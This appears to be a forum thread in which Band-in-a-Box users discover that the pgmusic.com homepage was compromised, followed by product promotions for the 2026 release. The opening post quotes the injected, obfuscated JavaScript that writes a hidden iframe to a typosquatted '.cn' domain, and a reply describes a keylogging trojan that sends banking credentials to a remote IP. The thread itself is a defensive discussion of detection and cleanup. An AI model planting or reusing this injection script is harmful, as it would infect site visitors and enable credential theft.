|
Log in to post
|
Print Thread |
|
|
|
|
|
Off-Topic
|
Joined: Mar 2001
Posts: 8
Newbie
|
OP
Newbie
Joined: Mar 2001
Posts: 8 |
If you look at the source for the pgmusic.com home page, do you see the following line?:
<body ><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>
Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning.
Just curious if this is something happening on my end or if it's actually in the page itself.
Thanks.
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jun 2005
Posts: 235
Apprentice
|
|
Apprentice
Joined: Jun 2005
Posts: 235 |
yes i see it in the source.
are you the Grayson who works at PG?
DTuna
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Sep 2007
Posts: 3,926
Veteran
|
|
Veteran
Joined: Sep 2007
Posts: 3,926 |
When I read this from my Internet machine, I looked at the status of Avast!, my AV program. It was OFF. I don't even know how to do that. I am doing a Thorough Scan as I write. If there's something going on I'll have to reinstall an AV program on my DAW as I tend to stay logged into PG.
I have received several emails in the last few weeks under friends' names, but which were clearly the result of worms. All the messages have contained links to Chinese websites, most purporting to sell computers. I have gotten reports of illicit Chinese activity from other sources as well. To my mind, Chinese black-hat crackers (what folks erroneously call "hackers", who are really the white hats) are ve-ry busy these days. Make sure your AV programs are on and up to date.
R.
"My primary musical instrument is the personal computer."
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jul 2006
Posts: 40
Enthusiast
|
|
Enthusiast
Joined: Jul 2006
Posts: 40 |
"Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning."
I'm getting the same thing when I try to go to the PGMusic home page through my SBC Yahoo browser. When I use just the MS Explorer browser, it doesn't happen. BTW, I am using Avast and Spybot.
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,648
Veteran
|
|
Veteran
Joined: May 2000
Posts: 22,648 |
Yeah, Avast jumped right in as soon as looked at the homepage - needs attention!
I hate those javascript redirectors - they can be anywhere in the code; sometimes in places that are not even suppose to get read (like between the head and body tags), which explains why some browsers are more susceptible than others... but regardless of browser the problem is there.
I do not work here, but the benefits are still awesome
Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Apr 2008
Posts: 1,122
Expert
|
|
Expert
Joined: Apr 2008
Posts: 1,122 |
Avast caught mine right away when I went to the page this morning. Since then it has not come up again.
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jan 2006
Posts: 2,689
Veteran
|
|
Veteran
Joined: Jan 2006
Posts: 2,689 |
It didn't make a lot of sense on my part, but I checked the homepage out. Avast worked for me also with a malware warning.
Don S.
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Mar 2001
Posts: 8
Newbie
|
|
OP
Newbie
Joined: Mar 2001
Posts: 8 |
Thanks. I did send them email about it. Hopefully it'll get addressed ASAP.
BTW I don't work for PG Music, Mr Tuna.
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Apr 2007
Posts: 445
Journeyman
|
|
Journeyman
Joined: Apr 2007
Posts: 445 |
Hi
I'm also getting a trojan virus warning from Kaspersky when opening up PGMusic homepage what does this mean and is it being looked at.
The warning from Kaspersky is Trojan-Downloader.JS.Iframe.bjn
Brian Cadoret
Brian Cadoret
BIAB 2025 Pro build 1125e with BIAB2023 UltraPAK . Samplitude Pro X4 Suite. Mixcraft 10.5 Pro Studio
Focusrite 2i2 Scarlett
Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz 3.20 GHz
Installed RAM 8.00 GB
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,648
Veteran
|
|
Veteran
Joined: May 2000
Posts: 22,648 |
I have heard that ridding a site of these types of infections is a tough task and time consuming so I assume they'll need a little time to resolve it. I know of business sites that took a few weeks getting rid of it, only to get it again. Keep your AV updated. Use SpybotS&D too, as these redirectors hide from the Windows API and do not show up in antivirus scans or the running processes list. They can be tough to get rid of. Here's a description of one such javascript redirecor - After execution of e.g. 9129837.exe PWS.Small.bs installs a service (hide_evr2) and copies itself and the service file to the Windows directory. Additionally an autorun entry (ttool) is created which loads the 9129837.exe on every windows startup. The service affects that the two files and the autorun entry are hidden from the windows API, i.e. the user cannot see the files. If you visit webpages with forms like ebay or online banking pages the filled-in information like userid and password/pin are sent to http://81.95.147.107/cgi-bin/**** ADDITIONAL REMOVAL INSTRUCTION: Please reboot your PC in Safe Mode and perform another scan of Spybot - Search & Destroy to remove the remainings.Having unfamiliar proccesses running like the above mentioned "9129837.exe " is not a good sign..
I do not work here, but the benefits are still awesome
Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Sep 2007
Posts: 3,926
Veteran
|
|
Veteran
Joined: Sep 2007
Posts: 3,926 |
My Avast! scan didn't show anything, but there was an info page somewhere that did list the 'microsotf.cn' thingie as an infection. More importantly, though, when I checked Avast! it was OFF again--not just that the scanners were disabled, but the program was not resident in memory. This is very concerning. I've started it again and will be keeping a close eye on it.
Edit: Followup: I can run a scan with Avast! but it does not run on Windows startup and will not stay in memory. I'm downloading AVG as I write.
So, we think this thing is a keystroke logger?
R.
"My primary musical instrument is the personal computer."
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jan 2006
Posts: 2,689
Veteran
|
|
Veteran
Joined: Jan 2006
Posts: 2,689 |
Richard,
I had the same problem with Avast a while back. I deleted and then reinstalled it. So far, so good.
Don S.
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,648
Veteran
|
|
Veteran
Joined: May 2000
Posts: 22,648 |
It is likely a keylogger - please go back and read my previous post - an antivirus will NOT find it
use SPYBOT quickly
I would disconnect from internet, (you may have to be on internet to install Spybot Search and Destroy) then scan, then scan again in safe mode as per Spybot instructions.
It is *probably* taking keylogging info and sending to a site somewhere... that is the purpose of these types of trojans
I am NOT trying to cause widespread panic, but it is a serious threat when one of these gets in, I have first and second hand experience removing this for others. Tend to your machine, especially if you have banking accounts or access to other web sites thru FTP on that machine.
If you watch when it first gets in you can see it connecting to .cn sites to update itself and start running...
I tested a couple infected sites and closely watched the results.
It gets into a web site through FTP by an infected admin, so all access should be closed and known clean backups used. Hopefully these exist on a source seperate from the main site.
A clean machine should also be used to reset all passwords for any admins to get access. Otherwise passwords are still held at the remote site for later reinfection.
It's an ugly ugly situation once it gets in.
I can list other sites infected right now, and have actually reported them to Google but they have not responded by associating a warning with these sites yet.
I do not work here, but the benefits are still awesome
Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,648
Veteran
|
|
Veteran
Joined: May 2000
Posts: 22,648 |
As a side note - some versions are capable of adapting to the php used in forums, hopefully pgmusic is on top of this and the site is hosted seperately.
If PGMusic wants to check, look at the php script in the index.php files for added cryptic php code.
It will not be easy to see using the 'view source' but will easy to see using the source codes on the server.
Also trojans seems to like the 'include' folders and javascript folders.
This, however is much more rare than the current version that is infecting sites.
I suggest keeping a copy of install files for Spybot and Antivirus on a drive somewhere. I have seen these types of trojans block access to Avast, McAfee and Symantec, and probably others..
just trying to help with what I have seen.
I do not work here, but the benefits are still awesome
Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2005
Posts: 222
Apprentice
|
|
Apprentice
Joined: May 2005
Posts: 222 |
I'm running Linux and just safely saved the 25.8 KB malware download to disk. It's name is 955.pdf, so perhaps it it using an Acrobat exploit. I found another site that thinks their site was infected with it on 7/4.
(http://olegvolk.livejournal.com/628779.html)
If anyone needs the internal contents of the file, let me know. I will keep it a few days before deleting the file. For those using AVG antivirus protection, I ran an AVG scan on the file and AVG passed it as being OK, so be careful.
By the way, I urge all of you to only use Linux for surfing the internet.
JBlatz
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,648
Veteran
|
|
Veteran
Joined: May 2000
Posts: 22,648 |
Linux is fine until you run into a virus designed to exploit Linux.
There are just about as many security updates for Linux as there are for Windows these days.. depending on the brand of Linux you want to run.
I use Linux Live CD's to get into infected systems and repair sometimes, so I know it has benefits for trojans designed to exploit windows, but it is by no means completely safe.
I would be interested in viewing the file contents, but I'd need to access it on a safer machine. Besides, a lot of mail servers will indeed catch it and stop delivery, as a lot of them are running linux also!
Congrats on outsmarting this one, and thanks for the extra efforts.
Other sites with the infection include dademoldinspectors and enviropro.net... among hundreds of others.
If you are interested in helping for these types of things, check out badwarebusters.org
I do not work here, but the benefits are still awesome
Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 38,502
Veteran
|
|
Veteran
Joined: May 2000
Posts: 38,502 |
Has the pgmusic homepage been fixed?
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jan 2002
Posts: 10,199
Veteran
|
|
Veteran
Joined: Jan 2002
Posts: 10,199 |
I used the Live Help to ask. This is the reply I got: "Jareth: Welcome to PG Music's live help. May we please have your first and last name to better assist you? you: HI, this is Gary Curran. Do you know if anyone has found and removed the virus loader program from the main web page yet? you: There is a thread in the Off Topic forum about it, several of us running Avast A/V have had Malware warnings about it. Jareth: I'm currently asking our webmaster Jareth: give me one moment you: thank you, Jareth.  Jareth: webmaster says there is a script and that it is likely not dangerous - the contents are currently being analyzed and we will inform everyone as soon as we have reached a conclusion you: okay. Thanks a lot. you: have a great day. Jareth: you're welcome, bye you: END CHAT Jareth: you too Gary
I'm blessed watching God do what He does best. I've had a few rough years, and I'm still not back to where I want to be, but I'm on the way and things are looking far better now than what they were!
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,648
Veteran
|
|
Veteran
Joined: May 2000
Posts: 22,648 |
JBlatz - what makes you think that the malware is called 955.pdf? That appears to be a valid program/ format. http://www.pdf995.com/What I saw was a downloader script - a couple different warnings actually.. when I went to the home page.
I do not work here, but the benefits are still awesome
Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Apr 2007
Posts: 445
Journeyman
|
|
Journeyman
Joined: Apr 2007
Posts: 445 |
Hi
Just visited the PGMusic homepage and Kaspersky is NOT giving me trojan warnings anymore , I hope this is a good sign.
Brian Cadoret
Brian Cadoret
BIAB 2025 Pro build 1125e with BIAB2023 UltraPAK . Samplitude Pro X4 Suite. Mixcraft 10.5 Pro Studio
Focusrite 2i2 Scarlett
Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz 3.20 GHz
Installed RAM 8.00 GB
|
|
|
|
|
|
|
|
|
|
|
|
Ask sales and support questions about Band-in-a-Box using natural language.
ChatPG's knowledge base includes the full Band-in-a-Box User Manual and sales information from the website.
|
|
|
|
|
|
|
|
|
|
|
Last Chance! The Band-in-a-Box® 2026 for Mac® Special Ends Today (May 31, 2026) at 11:59pm PDT!
Time really is running out! Save up to 50% on Band-in-a-Box® 2026 for Mac® upgrades and receive a FREE Bonus PAK—only when you order by 11:59 PM PDT today!
We've added many major new features and new content in a redesigned Band-in-a-Box® 2026 for Mac®!
Version 2026 introduces a modernized GUI redesign across the program, with updated toolbars, refreshed windows, smoother workflows, and a new Dark Mode option. There’s also a new side toolbar for quicker access to commonly used windows, and the new Multi-View feature lets you arrange multiple windows as layered panels without overlap, making it easier to customize your workspace.
Another exciting new addition is the amazing new AI-Notes feature, which can transcribe polyphonic audio into MIDI. View the results in notation or play them back as MIDI, and choose whether to transcribe an entire track or transcribe specific parts like drums, bass, guitars/piano, or vocals. There's over 100 new features in Band-in-a-Box® 2026 for Mac®.
There's an amazing collection of new content too, including 202 RealTracks, new RealStyles, MIDI SuperTracks, Instrumental Studies, “Songs with Vocals” Artist Performance Sets, Playable RealTracks Set 5, two RealDrums Stems sets, and much more!
Upgrade your Band-in-a-Box for Mac® to save up to 50% on most Band-in-a-Box® 2026 upgrade packages!
Plus, when you order your Band-in-a-Box® 2026 Mac upgrade during our special, you'll receive a Free Bonus PAK of exciting new add-ons.
If you need any help deciding which package is the best option for you, just let us know. We are here to help!
Band-in-a-Box® 2026 Mac Special Offers Extended Until May 31st!
Good news- we've extended our Band-in-a-Box® 2026 for Mac® special offers until May 31, 2026!
Band-in-a-Box® 2026 is packed with major new features, enhancements, and an incredible lineup of new content! The program now sports a sleek, modern GUI redesign across the entire interface, including updated toolbars, refreshed windows, smoother workflows, a new dark mode option, and more. The brand-new side toolbar provides quicker access to key windows, while the new Multi-View feature lets you arrange multiple windows as layered panels without overlap, creating a flexible, clutter-free workspace. We have an amazing new “AI-Notes” feature. This transcribes polyphonic audio into MIDI so you can view it in notation or play it back as MIDI. You can transcribe an entire track (all pitched instruments and drums) or focus on individual parts like drums, bass, guitars/piano, or vocals. There's an amazing collection of new content too, including 202 RealTracks, new RealStyles, MIDI SuperTracks, Instrumental Studies, “Songs with Vocals” Artist Performance Sets, Playable RealTracks Set 5, two RealDrums Stems sets, and much more!
There are over 100 new features in Band-in-a-Box® 2026 for Mac®.
When you order purchase Band-in-a-Box® 2026 before 11:59 PM PDT on May 31st, you'll also receive a Free Bonus PAK packed with exciting new add-ons.
Check out the Band-in-a-Box® for Mac packages page to find the best package for you.
Holiday Weekend Hours
It's Victoria Day Long Weekend in Canada. Our Customer Service hours are:
Saturday, May 16: Closed
Sunday, May 17: Closed
Monday, May 18: 8:00am - 4:00pm
Regular hours resume Tuesday, May 19th!
Today's the Last Day of the Band-in-a-Box 2026® for Mac Special!
Order before 11:59pm PDT today (May 15, 2026) to save up to 50% off your Band-in-a-Box® 2026 for Mac® upgrade and receive a FREE Bonus PAK loaded with great new Add-ons to use with this new version!
Don't wait - order today!
Check out all the new features in the redesigned Band-in-a-Box® 2026 for Mac®!
Band-in-a-Box® 2026 for Mac - Special Offers End at 11:59pm PDT on Friday, May 15th, 2026!
Order before 11:59pm PDT on Friday, May 15th and SAVE up to 50% on most Band-in-a-Box® version 2026 for Mac Upgrade packages... and that's not all! With your version 2026 for Mac purchase, we'll include a Bonus PAK full of great new Add-ons FREE! Upgrade to the 2026 49-PAK to receive even more NEW Add-ons including 20 additional RealTracks... that's 222 NEW RealTracks available with version Band-in-a-Box® 2026 for Mac!
Upgrade to Band-in-a-Box® 2026 for Mac® today for as little as $49! Check out the Band-in-a-Box® packages page for all available purchase options.
Learn more about the Free Bonus PAK and 49-PAK here.
If you have any questions about which package is the best option for you, just let us know. We're here to help!
202 New RealTracks Released with Band-in-a-Box 2026!
With Band-in-a-Box® 2026, we've released 202 incredible new RealTracks (in sets 468-488) in a variety of genres—featuring your most requested styles!
Jazz, Funk & World (Sets 468-475):
Our new jazz, funk & blues RealTracks include a groovin’ collection of RealTracks and RealDrums! These include more requested “soul jazz” RealTracks featuring artists Neil Swainson (bass), Charles Treadway (organ), Brent Mason (guitar), and Wes Little (drums). There are new “smooth jazz” styles (4), which include a RealTracks first: muted trumpet, as well as slick new smooth jazz brushes options for drums. Blues lovers will be thrilled—there are more “classic acoustic blues” styles, including guitar (5), bass (4), and drums (10) with blues master Colin Linden, featuring understated and tasty background acoustic soloing, plus brushes drums and acoustic bass. There are also new electric blues RealTracks, including electric blues with PG favorite Johnny Hiland (3) and soulful electric slide guitar from Colin Linden (4). If you love funk & gospel, there are great new options this year, including gospel organ (3) from Charles Treadway, as well as new funk, tango, and rock ’n’ roll drums (3) and bass (1). And for big, bold arrangements, we have uptempo soul horns (4) featuring a three-part hip horn section with options for a full mix or stems of each individual horn — plus an accompanying rhythm section (4) of drums, bass, guitar, and electric piano!
Rock & Pop (Sets 476–482):
Our new rock & pop RealTracks bring a powerful mix of requested favorites, fresh genres, and modern chart-inspired styles! We have more of our popular “Producer Layered Acoustic Guitars (15)” featuring Band-in-a-Box favorite Brent Mason. We’ve continued our much-requested disco styles (10), and added new Celtic guitar (5) with a more basic, accessible approach than our previous Drop-D or DADGAD offerings. There are also highly requested yacht rock styles (17), inspired by the smooth, polished soft-rock sound of the late ’70s and early ’80s — laid-back grooves, silky electric pianos, warm textures, elegant harmonic movement, and pristine production aesthetics. Fans of heavier styles will love our new glam metal (13), capturing the flashy, high-energy sound of ’80s arena-ready guitar rock. We also have a set of rootsy modern-folk rock (18), with a warm, organic sound combining contemporary folk textures and driving acoustic strumming. And we’ve added lots of new modern pop styles (16) — the kinds of sounds you’re hearing on the radio today, featuring exciting new drums, synths, and cutting-edge RealTracks arrangements.
Country, & Americana (Sets 483–488):
Our new country & Americana RealTracks deliver a rich collection of acoustic, electric, and roots-inspired styles! We have new country pop (9) with legendary guitarist Brent Mason. There is also a potpourri (14) of bouzouki, guitars, banjo, and more, perfect for adding texture and character to contemporary acoustic arrangements. We’ve added funky country guitar (5) with PG favorite Brent Mason, along with classic pedal steel styles (5) featuring steel great Doug Jernigan. There are more country songwriter styles (8) that provide intimate, rootsy foundations for storytelling and modern Americana writing. Finally, we have “background soloing” acoustic guitar (12) with Brent Mason — simpler, but still very tasty acoustic lines designed to sit beautifully behind vocals or act as a subtle standalone solo part.
Check out all the 202 new RealTracks (in sets 468-488)!
And, if you are looking for more, the 2026 49-PAK (for $49) includes an impressive collection of 20 bonus RealTracks, featuring exciting and inspiring additions to add to your RealTracks library. You'll get new country-rhythm guitar styles from PG Music favorites Johnny Hiland and Brent Mason, along with modern-pop grooves that capture today’s radio-ready sound! There are also new indie-folk styles with guitar, bass, 6-string bass used as a high-chording instrument, acoustic guitar, and banjo. Plus, dedicated "cymbal fills" RealDrums provide an added layer that work very well with low-key folky styles with other percussion.
The 2026 49-PAK is loaded with other great new add-ons as well. Learn more about the 2026 49-PAK!
2026 Free Bonus PAK & 49-PAK for Band-in-a-Box® 2026 for Mac®!
With your version 2026 for Mac Pro, MegaPAK, UltraPAK, UltraPAK+, Audiophile Edition or PlusPAK purchase, we'll include a Bonus PAK full of great new Add-ons for FREE! Or upgrade to the 2026 49-PAK for only $49 to receive even more NEW Add-ons including 20 additional RealTracks!
These PAKs are loaded with additional add-ons to supercharge your Band-in-a-Box®!
This Free Bonus PAK includes:
- The 2026 RealCombos Booster PAK:
-For Pro customers, this includes 27 new RealTracks and 23 new RealStyles.
-For MegaPAK customers, this includes 25 new RealTracks and 23 new RealStyles.
-For UltraPAK customers, this includes 12 new RealStyles.
- MIDI Styles Set 92: Look Ma! More MIDI 15: Latin Jazz
- MIDI SuperTracks Set 46: Piano & Organ
- Instrumental Studies Set 24: Groovin' Blues Soloing
- Artist Performance Set 19: Songs with Vocals 9
- Playable RealTracks Set 5
- RealDrums Stems Set 9: Cool Brushes
- SynthMaster Sounds Set 1 (with audio demos)
- iOS Android Band-in-a-Box® App
Looking for more great add-ons, then upgrade to the 2026 49-PAK for just $49 and you'll get:
- 20 Bonus Unreleased RealTracks and RealDrums with 20 RealStyle.
- FLAC Files (lossless audio files) for the 20 Bonus Unreleased RealTracks and RealDrums
- MIDI Styles Set 93: Look Ma! More MIDI 16: SynthMaster
- MIDI SuperTracks Set 47: More SynthMaster
- Instrumental Studies 25 - Soul Jazz Guitar Soloing
- Artist Performance Set 20: Songs with Vocals 10
- RealDrums Stems Set 10: Groovin' Sticks
- SynthMaster Sounds & Styles Set 2 (sounds & styles with audio demos)
Learn more about the Bonus PAK and 49-PAK for Band-in-a-Box® 2026 for Mac®!
|
|
|
|
|
|
|
|
|
|
|
|
Forums57
Topics86,441
Posts805,143
Members40,121
| |
Most Online64,515
Apr 8th, 2026
|
|
|
|
|
|
|
|
|
Dansk
Deutsch - Windows
Español
Français - Windows
Italiano - Windows
Nederlands
Polski
Português
Svenskt
русский
Japanese
Simplified Chinese
Traditional Chinese
Korean